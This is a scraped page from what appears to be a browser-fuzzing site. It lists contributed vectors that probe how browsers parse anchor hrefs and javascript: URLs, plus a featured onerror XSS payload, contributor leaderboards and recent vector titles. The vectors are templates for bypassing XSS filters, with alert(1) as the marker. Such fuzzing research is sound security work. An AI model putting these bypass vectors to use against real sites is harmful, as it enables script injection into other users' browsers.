Featured vector

Default Browser 0.0
 <img0x0dsrc0x0donerror=alert(1)>

Fuzz vector cloud

3,403,521 Successful fuzzes

Fuzz Vectors

Searching for "Anchor"

Your browser identified as

General Crawlers unknown

All vectors

Description	Vector	Created by
Characters that can be used to terminate entities in an href	<a href="javascript&colonchrlog(num)" id="fuzzelementnum">test</a>	@tifkin_
Characters allowed after domain	<a href="http://google.comchrbreakme" id="fuzzelementnum">test</a>	@avlidienbrunn
Characters allowed before http	<a href="http://chrgoogle.com" id="fuzzelementnum">test</a>	@avlidienbrunn
Characters allowed before slashes no protocol	<a href="chr//google.com" id="fuzzelementnum">test</a>	@garethheyes
Characters allowed inside slashes no protocol	<a href="/chr/google.com" id="fuzzelementnum">test</a>	@garethheyes
Characters allowed instead of slash 2	<a href="http:chrchrgoogle.com" id="fuzzelementnum">test</a>	@garethheyes
Characters allowed instead of slash	<a href="http:chrgoogle.com" id="fuzzelementnum">test</a>	@garethheyes
Characters allowed after slash	<a href="http:/chr/google.com" id="fuzzelementnum">test</a>	@garethheyes
Characters allowed inside http	<a href="htchrtp://google.com" id="fuzzelementnum">test</a>	@garethheyes
Characters allowed instead of forward slash in url	<a href="chrchrgoogle.com" id="fuzzelementnum">test</a>	@garethheyes
Characters allowed instead of colon in js url	<a href="javascriptchralert(1)" id="fuzzelementnum">test</a>	@garethheyes
Entities allowed instead of colon for js protocol	htmlStr = '<a href="javascript'+dataentities+'123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { customLog(dataentities); } }catch(e){};	@peksa
Entities allowed after js protocol	htmlStr = '<a href="javascript'+dataentities+':123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { customLog(dataentities); } }catch(e){};	@garethheyes
Entities allowed before js protocol	htmlStr = '<a href="'+dataentities+'javascript:123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { customLog(dataentities); } }catch(e){};	@garethheyes
Characters allowed after ampersand in named character references	<a href="javascript&chrcolon;log(num)" id="fuzzelementnum">test</a>	@_cweb
Characters in between protocol in js url	<a href="javaschrcript:alert(1)" id="fuzzelementnum">test</a>	@garethheyes
Characters allowed before protocol in js url	<a href="chrjavascript:alert(1)" id="fuzzelementnum">test</a>	@garethheyes
Characters allowed before colon in js url	<a href="javascriptchr:alert(1)" id="fuzzelementnum">test</a>	@garethheyes

Top fuzzers
insertScript (688)
garethheyes (256)
0x6D6172696F (51)
i_bo0om (51)
JohnathanKuskos (46)
heyheyheyhey10 (43)
tifkin_ (42)
palindrom (38)
jackmasa (35)
Giutro (35)
albinowax (33)
0xAli (33)
avlidienbrunn (30)
mramydnei1 (24)
Lamp_AE (22)
peksa (21)
skeptic_fx (19)
D_Szameitat (19)
ahpaleus (18)
irsdl (18)

New users
T_Nisipeanu
Lamp_AE
HackingBrowser
y3gou666
jeem36800855
KagamigawaAlter
AugustoMunue
tunaninhesabi
s0md3v
DrStache_
Goo85383451
molenzwiebel
BenjaminFreyArt
itszn13
Khangarood
edu_nuri
TOXXIC_407
PondMido
h0n3yc4k3
samengmg

Popular recent vectors
Just testing man
Unicode characters that normalize to a dot in URLs
test2
test_browser_backdoor
Tags with Onerror
Characters that can go on either side of in attribute
Valid HTML Attribute Seperators
Tags with JS capable Events

Latest vectors
Tags with JS capable Events
Tags with Onerror
Characters that can go on either side of in attribute
Valid HTML Attribute Seperators
Unicode characters that normalize to a dot in URLs
test2
test_browser_backdoor
Just testing man
testxx
characters that can assign values to attributes

© 2019 Copyright Gareth Heyes